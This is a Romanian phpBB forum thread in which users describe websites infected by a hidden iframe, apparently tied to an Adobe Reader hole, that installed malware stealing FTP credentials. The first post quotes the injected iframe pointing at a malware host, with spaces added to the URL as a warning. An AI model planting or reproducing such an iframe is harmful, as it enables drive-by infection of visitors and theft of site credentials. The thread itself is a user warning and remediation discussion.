Site-uri infectate - din cauza la Adobe Reader?!

Discuţii diverse, dar centrate pe subiecte IT.
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Avatar utilizator
Mallzebuth
Utilizator înregistrat
Mesaje: 186
Membru din: 14-Feb-2008, 13:18:54
Versiune: 3.0.2
Ext: Da
Server: UNIX/Linux
Nivel phpBB: Mediu
Localitate: Sibiu
Contact:

Site-uri infectate - din cauza la Adobe Reader?!

Mesaj de Mallzebuth »

Ei bine... imi veti spune: "ce legatura are securitatea site-urilor cu Adobe Reader?" O sa incerc sa-mi dau seama si eu pe masura ce explic situatiile paranormale ce mi s-au intamplat in ultimele zile.
Din ce in ce mai multe site-uri sunt infectate cu niste scripturi dubioase. In codul paginilor am gasit iframe-uri care incarca si executa alte treburi:
<iframe src="http:// q5m.ru: 8080/index.php" width=123 height=111 style="visibility: hidden"></iframe> (am pus niste spatii in link, nu-l accesati)
M-am ales cu un virus in urma unei simple navigari pe internet. Voi da linkurile a catorva site-uri de genul daca va intereseaza. :D Inteleg ca un virus se poate downloada in background, dar cum dracu reuseste sa se si deschida?! Ei bine, cu ajutorul la Adobe Reader. Momentan am sters executabilul de la Adobe pana gasesc o solutie mai buna.
In momentul cand am accesat site-ul respectiv am observat ceva ciudat. Mi-a aparut logo-ul de la Adobe Reader ca si cum se deschide un fisier PDF (pagina respectiva era in format php!). Am dat CTR + ALT + DEL si am gasit cateva procese ciudate. Deja virusul era "on" si-si facea treburile cu grija. Ce facea defapt acel virus? Fura datele de la conturile FTP care mai apoi le folosea pentru a infecta alte site-uri. Ce n-am inteles e cum a reusit sa se si deschida programelul (virusul), doar accesand o pagina PHP.
Nu mai stiu link-ul site-ului, insa am mai descoperit in urmatoarele zile alte cateva site-uri cu acelasi fenomen.
E posibil ca Adobe Reader sa aiba o gaura de securitate, si permite cumva executia si a fisierelor executabile, nu doar a fisierelor de format PDF.
Pe scurt, aveti grija la PDF-uri, nu intotdeauna Google avertizeaza ca "site-ul poate dauna calculatorului dumneavoastra". :P
Descoperă - Plăcerea de a cunoaşte http://www.descopera.org
Avatar utilizator
pK - eXplosive
Utilizator înregistrat
Mesaje: 1647
Membru din: 27-Iun-2007, 00:57:16
Versiune: 3.0.5
Ext: Da
Server: Windows
Nivel phpBB: Mediu
Localitate: Botosani

Re: Site-uri infectate - din cauza la Adobe Reader?!

Mesaj de pK - eXplosive »

Am patit si eu exact la fel cu un script iframe care se baga in orice cont FTP in care ma logam, rezolvare : reinstall windows si reinstall la tot ce ai pe domeniu (asa am procedat eu).
Avatar utilizator
Mallzebuth
Utilizator înregistrat
Mesaje: 186
Membru din: 14-Feb-2008, 13:18:54
Versiune: 3.0.2
Ext: Da
Server: UNIX/Linux
Nivel phpBB: Mediu
Localitate: Sibiu
Contact:

Re: Site-uri infectate - din cauza la Adobe Reader?!

Mesaj de Mallzebuth »

Eu am oprit imediat procesele suspecte, am cautat dupa ele pe HDD si apoi le-am sters. Am scapat usor, n-a apucat sa provoace pagube. :) Insa sunt sigur ca au patit altii treburi mai urate. Observat la timp, scapi relativ usor de probleme. Problema e cu cei care nu stiu de treaba asta urata cu Adobe... Oricum, recomand dezinstalarea programului Adobe Reader sau redenumirea executabilului (si folosit doar cand este nevoie). Asta cel putin pana la o noua versiune. Sunt chiar foarte multe site-uri romanesti infectate (descopera. net de exemplu - Nu accesati site-ul)
P.S. Eu am Adobe Reader 8, nu stiu daca si la alte versiuni este aceasi problema de securitate...
Descoperă - Plăcerea de a cunoaşte http://www.descopera.org
Avatar utilizator
pK - eXplosive
Utilizator înregistrat
Mesaje: 1647
Membru din: 27-Iun-2007, 00:57:16
Versiune: 3.0.5
Ext: Da
Server: Windows
Nivel phpBB: Mediu
Localitate: Botosani

Re: Site-uri infectate - din cauza la Adobe Reader?!

Mesaj de pK - eXplosive »

Dar nu sunt sigur ca de la adobe reader am luat virus-ul, adica nu mai stiu sigur.
Avatar utilizator
bogdan
AdministratorAdministrator
Mesaje: 10888
Membru din: 18-Oct-2002, 13:14:27
Versiune: 3.0.11
Ext: Da
Server: UNIX/Linux
Nivel phpBB: Experimentat
Nivel php: Mediu
Localitate: Bucuresti
Contact:

Re: Site-uri infectate - din cauza la Adobe Reader?!

Mesaj de bogdan »

De preferat sa "tineti" aplicatia actualizata cu ultima versiune + un antivirus din seria celor "serioase".
Scrie răspuns

Înapoi la “Diverse”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 4 vizitatori